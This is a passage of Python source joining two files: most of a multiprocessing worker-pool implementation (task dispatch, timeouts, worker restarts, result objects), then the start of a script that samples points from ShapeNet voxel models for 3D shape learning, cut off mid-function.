"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._Process = self._ctx.Process
self._pool = []
self._poolctrl = {}
self._on_ready_counters = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool,
self._cache)
if threads:
self._task_handler.start()
self.check_timeouts = None
# Thread killing timedout jobs.
if self.enable_timeouts:
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
else:
self._timeout_handler = None
self._timeout_handler_started = False
self._timeout_handler_mutex = None
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, on_ready_counters=self._on_ready_counters,
**extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
on_ready_counter = self._ctx.Value('i')
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
on_ready_counter=on_ready_counter,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
self._on_ready_counters[w.pid] = on_ready_counter
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worked %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
del self._on_ready_counters[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0} Job: {1}.'.format(
human_status(exitcode), job._job),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads and self._timeout_handler is not None:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the functions return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i + 1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
if inqueue:
inqueue.close()
if outqueue:
outqueue.close()
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<%s: {id} ack:{ack} ready:{ready}>'.format(
self.__class__.__name__,
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from .dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
2_gather_256vox_16_32_64.py
|
import numpy as np
import cv2
import os
import h5py
from scipy.io import loadmat
import random
import json
from multiprocessing import Process, Queue
import queue
import time
#import mcubes
class_name_list_all = [
"02691156_airplane",
"02828884_bench",
"02933112_cabinet",
"02958343_car",
"03001627_chair",
"03211117_display",
"03636649_lamp",
"03691459_speaker",
"04090263_rifle",
"04256520_couch",
"04379243_table",
"04401088_phone",
"04530566_vessel",
]
class_name = "03001627_chair"
dim = 64
vox_size_1 = 16
vox_size_2 = 32
vox_size_3 = 64
batch_size_1 = 16*16*16
batch_size_2 = 16*16*16
batch_size_3 = 16*16*16*4
'''
#do not use progressive sampling (center2x2x2 -> 4x4x4 -> 6x6x6 ->...)
#if sample non-center points only for inner(1)-voxels,
#the reconstructed model will have railing patterns.
#since all zero-points are centered at cells,
#the model will expand one-points to a one-planes.
'''
def sample_point_in_cube(block,target_value,halfie):
halfie2 = halfie*2
for i in range(100):
x = np.random.randint(halfie2)
y = np.random.randint(halfie2)
z = np.random.randint(halfie2)
if block[x,y,z]==target_value:
return x,y,z
if block[halfie,halfie,halfie]==target_value:
return halfie,halfie,halfie
i=1
ind = np.unravel_index(np.argmax(block[halfie-i:halfie+i,halfie-i:halfie+i,halfie-i:halfie+i], axis=None), (i*2,i*2,i*2))
if block[ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i]==target_value:
return ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i
for i in range(2,halfie+1):
six = [(halfie-i,halfie,halfie),(halfie+i-1,halfie,halfie),(halfie,halfie,halfie-i),(halfie,halfie,halfie+i-1),(halfie,halfie-i,halfie),(halfie,halfie+i-1,halfie)]
for j in range(6):
if block[six[j]]==target_value:
return six[j]
ind = np.unravel_index(np.argmax(block[halfie-i:halfie+i,halfie-i:halfie+i,halfie-i:halfie+i], axis=None), (i*2,i*2,i*2))
if block[ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i]==target_value:
return ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i
print('hey, error in your code!')
exit(0)
def get_points_from_vox(q, name_list):
name_num = len(name_list)
for idx in range(name_num):
print(idx,'/',name_num)
#get voxel models
try:
voxel_model_mat = loadmat(name_list[idx][1])
except:
print("error in loading")
exit(-1)
voxel_model_b = voxel_model_mat['b'][:].astype(np.int32)
voxel_model_bi = voxel_model_mat['bi'][:].astype(np.int32)-1
voxel_model_256 = np.zeros([256,256,256],np.uint8)
for i in range(16):
for j in range(16):
for k in range(16):
voxel_model_256[i*16:i*16+16,j*16:j*16+16,k*16:k*16+16] = voxel_model_b[voxel_model_bi[i,j,k]]
#add flip&transpose to convert coord from shapenet_v1 to shapenet_v2
voxel_model_256 = np.flip(np.transpose(voxel_model_256, (2,1,0)),2)
#vertices, triangles = mcubes.marching_cubes(voxel_model_256, 0.5)
#mcubes.export_mesh(vertices, triangles, "samples/"+name_list[idx][1][-10:-4]+"_origin.dae", str(idx))
#carve the voxels from side views:
#top direction = Y(j) positive direction
dim_voxel = 256
top_view = np.max(voxel_model_256, axis=1)
left_min = np.full([dim_voxel,dim_voxel],dim_voxel,np.int32)
left_max = np.full([dim_voxel,dim_voxel],-1,np.int32)
front_min = np.full([dim_voxel,dim_voxel],dim_voxel,np.int32)
front_max = np.full([dim_voxel,dim_voxel],-1,np.int32)
for j in range(dim_voxel):
for k in range(dim_voxel):
occupied = False
for i in range(dim_voxel):
if voxel_model_256[i,j,k]>0:
if not occupied:
occupied = True
left_min[j,k] = i
left_max[j,k] = i
for i in range(dim_voxel):
for j in range(dim_voxel):
occupied = False
for k in range(dim_voxel):
if voxel_model_256[i,j,k]>0:
if not occupied:
occupied = True
front_min[i,j] = k
front_max[i,j] = k
for i in range(dim_voxel):
for k in range(dim_voxel):
if top_view[i,k]>0:
fill_flag = False
for j in range(dim_voxel-1,-1,-1):
if voxel_model_256[i,j,k]>0:
fill_flag = True
else:
if left_min[j,k]<i and left_max[j,k]>i and front_min[i,j]<k and front_max[i,j]>k:
if fill_flag:
voxel_model_256[i,j,k]=1
else:
fill_flag = False
#vertices, triangles = mcubes.marching_cubes(voxel_model_256, 0.5)
#mcubes.export_mesh(vertices, triangles, "samples/"+name_list[idx][1][-10:-4]+"_alt.dae", str(idx))
#compress model 256 -> 64
dim_voxel = 64
voxel_model_temp = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
multiplier = int(256/dim_voxel)
halfie = int(multiplier/2)
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
voxel_model_temp[i,j,k] = np.max(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier])
#write voxel
sample_voxels = np.reshape(voxel_model_temp, (dim_voxel,dim_voxel,dim_voxel,1))
#sample points near surface
batch_size = batch_size_3
sample_points = np.zeros([batch_size,3],np.uint8)
sample_values = np.zeros([batch_size,1],np.uint8)
batch_size_counter = 0
voxel_model_temp_flag = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
temp_range = list(range(1,dim_voxel-1,4))+list(range(2,dim_voxel-1,4))+list(range(3,dim_voxel-1,4))+list(range(4,dim_voxel-1,4))
for j in temp_range:
if (batch_size_counter>=batch_size): break
for i in temp_range:
if (batch_size_counter>=batch_size): break
for k in temp_range:
if (batch_size_counter>=batch_size): break
if (np.max(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])!=np.min(voxel_model_temp[i-1:i+2,j-1:j+2,k-1:k+2])):
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
if (batch_size_counter>=batch_size):
print("64-- batch_size exceeded!")
exceed_64_flag = 1
else:
exceed_64_flag = 0
#fill other slots with random points
while (batch_size_counter<batch_size):
while True:
i = random.randint(0,dim_voxel-1)
j = random.randint(0,dim_voxel-1)
k = random.randint(0,dim_voxel-1)
if voxel_model_temp_flag[i,j,k] != 1: break
si,sj,sk = sample_point_in_cube(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier],voxel_model_temp[i,j,k],halfie)
sample_points[batch_size_counter,0] = si+i*multiplier
sample_points[batch_size_counter,1] = sj+j*multiplier
sample_points[batch_size_counter,2] = sk+k*multiplier
sample_values[batch_size_counter,0] = voxel_model_temp[i,j,k]
voxel_model_temp_flag[i,j,k] = 1
batch_size_counter +=1
sample_points_64 = sample_points
sample_values_64 = sample_values
#compress model 256 -> 32
dim_voxel = 32
voxel_model_temp = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
multiplier = int(256/dim_voxel)
halfie = int(multiplier/2)
for i in range(dim_voxel):
for j in range(dim_voxel):
for k in range(dim_voxel):
voxel_model_temp[i,j,k] = np.max(voxel_model_256[i*multiplier:(i+1)*multiplier,j*multiplier:(j+1)*multiplier,k*multiplier:(k+1)*multiplier])
#sample points near surface
batch_size = batch_size_2
sample_points = np.zeros([batch_size,3],np.uint8)
sample_values = np.zeros([batch_size,1],np.uint8)
batch_size_counter = 0
voxel_model_temp_flag = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
